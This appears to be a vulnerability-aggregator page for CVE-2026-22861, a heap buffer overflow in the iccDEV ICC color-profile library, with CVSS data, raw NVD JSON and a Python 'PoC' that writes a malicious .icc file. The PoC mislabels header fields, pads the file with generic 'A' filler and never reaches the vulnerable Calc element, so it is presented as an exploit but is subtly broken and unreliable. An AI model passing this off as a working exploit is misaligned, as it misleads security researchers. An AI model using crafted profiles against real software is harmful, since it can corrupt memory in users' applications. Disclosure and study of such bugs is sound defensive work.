Security Vulnerability Report
中文
CVE-2026-22861 CVSS 8.8 HIGH

CVE-2026-22861

Published: 2026-01-13 21:15:54
Last Modified: 2026-01-16 18:46:06
Source: [email protected]

Description

iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Prior to 2.3.1.2, There is a heap-based buffer overflow in SIccCalcOp::Describe() at IccProfLib/IccMpeCalc.cpp. This vulnerability affects users of the iccDEV library who process ICC color profiles. The vulnerability is fixed in 2.3.1.2.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:* - VULNERABLE
iccDEV库 < 2.3.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import struct import sys def create_malicious_icc_file(): """ PoC for CVE-2026-22861 Heap buffer overflow in SIccCalcOp::Describe() This PoC creates a malicious ICC profile that triggers the overflow. """ # ICC Profile Header (128 bytes) header = bytearray(128) header[0:4] = b'\x00\x00\x02\x00' # Profile size will be updated header[4:8] = b'acsp' # CMM Type header[8:12] = b'\x00\x00\x00\x00' # Profile version header[12:16] = b'\x00\x00\x00\x00' # Profile device class header[16:20] = b'\x00\x01\x00\x00' # Color space header[20:24] = b'\x00\x01\x00\x00' # PCS # Tag signature for 'mft2' (LUT16) tag_signature = b'mft2' # Malicious data that triggers buffer overflow in Describe() # This is a simplified representation overflow_data = b'A' * 10000 # Large overflow data # Create tag table entry tag_offset = 128 + len(overflow_data) tag_size = 1000 # Tag table tag_table = struct.pack('>III', struct.unpack('>I', tag_signature)[0], # Tag signature tag_offset, # Offset tag_size # Size ) profile = header + overflow_data + tag_table # Update profile size in header struct.pack_into('>I', profile, 0, len(profile)) return bytes(profile) def main(): print("CVE-2026-22861 PoC Generator") print("Generating malicious ICC profile...") malicious_profile = create_malicious_icc_file() output_file = 'CVE-2026-22861_malicious.icc' with open(output_file, 'wb') as f: f.write(malicious_profile) print(f"Malicious ICC profile created: {output_file}") print(f"File size: {len(malicious_profile)} bytes") print("\nNote: This PoC demonstrates the vulnerability structure.") print("Actual exploitation requires specific target environment.") if __name__ == '__main__': main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22861", "sourceIdentifier": "[email protected]", "published": "2026-01-13T21:15:54.437", "lastModified": "2026-01-16T18:46:06.070", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Prior to 2.3.1.2, There is a heap-based buffer overflow in SIccCalcOp::Describe() at IccProfLib/IccMpeCalc.cpp. This vulnerability affects users of the iccDEV library who process ICC color profiles. The vulnerability is fixed in 2.3.1.2."}, {"lang": "es", "value": "iccDEV proporciona un conjunto de bibliotecas y herramientas que permiten la interacción, manipulación y aplicación de perfiles de gestión de color del Consorcio Internacional del Color (ICC). Anterior a 2.3.1.2, existe un desbordamiento de búfer basado en montículo en SIccCalcOp::Describe() en IccProfLib/IccMpeCalc.cpp. Esta vulnerabilidad afecta a los usuarios de la biblioteca iccDEV que procesan perfiles de color ICC. La vulnerabilidad está corregida en 2.3.1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-120"}, {"lang": "en", "value": "CWE-130"}, {"lang": "en", "value": "CWE-252"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.2", "matchCriteriaId": "D34CF745-E75A-4F1C-AD7B-9AC1A2E9F680"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/commit/fa9a364c01fc2e59eb2291e1f9b1c1359b7d5329", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/pull/475", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/pull/476", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-vr49-3vf8-7j5h", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.